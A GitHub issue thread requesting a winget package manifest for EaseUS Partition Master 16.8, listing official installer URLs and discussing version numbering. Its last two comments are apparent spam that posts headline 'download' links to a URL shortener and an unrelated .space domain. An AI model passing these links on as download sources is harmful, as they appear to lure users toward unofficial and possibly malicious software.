### ISSUE TITLE
[Package Request]: EaseUS Partition Master 16.8

### ISSUE THREAD

**Issue by stilett0** [microsoft/winget-pkgs#58543]
### Package Requested

- [X] I would like someone else to build the manifest.
- [ ] I would like help so I can submit the manifest.
- [X] I have performed a search and couldn't find this package.
- [X] I have checked that the installer for this package is not a standalone or portable executable or a .zip file
- [X] I think there is a new version available and I have provided the URL.

### Please provide the following information

Publisher: EaseUS
Publisher Url: https://www.easeus.com/partition-manager/
Package Name: EaseUS Partition Master
Description: 'EaseUS Partition Master Free Edition is a partition solution and disk management utility.
  It allows you to extend partition, especially for system drive, settle low disk space problem, manage disk space easily on MBR and GUID partition table (GPT) disk under 32 bit and 64 bit Windows 2000/XP/Vista/Windows 7 SP1/Windows 8.
  The most popular hard disk management functions are brought together with powerful data protection including: Partition Manager, Disk and Partition Copy Wizard and Partition Recovery Wizard.'
Package Version: 16.8
Installer URL: https://download.easeus.com/free/epm_suite_freeB24.exe

Current Package Identifier (for new versions): EaseUS.PartitionMaster

**Comment by stilett0** [comment]
Continuing onward from https://github.com/microsoft/winget-pkgs/issues/34766#issuecomment-1009022933

https://download.easeus.com/free/epm_free_B18.exe
Install the final release of Partition Master 16.5 without installing the Suite.

Partition Master Suite:
https://download.easeus.com/free/epm_suite_freeB15.exe = 16.0
https://download.easeus.com/free/epm_suite_freeB16.exe = 16.5
https://download.easeus.com/free/epm_suite_freeB17.exe = 16.6
https://download.easeus.com/free/epm_suite_freeB18.exe = 16.6
https://download.easeus.com/free/epm_suite_freeB18.exe = 16.6
https://download.easeus.com/free/epm_suite_freeB19.exe = 16.6
https://download.easeus.com/free/epm_suite_freeB20.exe = 16.6
https://download.easeus.com/free/epm_suite_freeB21.exe = 16.8
https://download.easeus.com/free/epm_suite_freeB22.exe = 16.8
https://download.easeus.com/free/epm_suite_freeB23.exe = 16.8
https://download.easeus.com/free/epm_suite_freeB24.exe = 16.8
(not sure if these are slightly newer/older releases of 16.8.0.0, different arch's, or what?)

Unlike 16.5, I haven't discovered a way to install 16.6 or 16.8 without the Suite (ie. epm_free_Bxx.exe) but perhaps there is still yet another way.

Not sure if Partition Master Suite should get a new identifier? It's clearly a continuation of the original Partition Master.

**Comment by SpecterShell** [comment]
https://github.com/vedantmgoyal2009/vedantmgoyal2009/issues/250

**Comment by wp338403** [comment]
# [EaseUS Partition Master Download](https://wp.me/sgJOm1-ddl)

**Comment by cheddar-frill-lily** [comment]
# **[🌐 EaseUS Partition Master Link](https://newlink9.kyzwc4.space/?tag=1qYJwvH1:C15)**
.
.
.
.
.
.
.
.
.
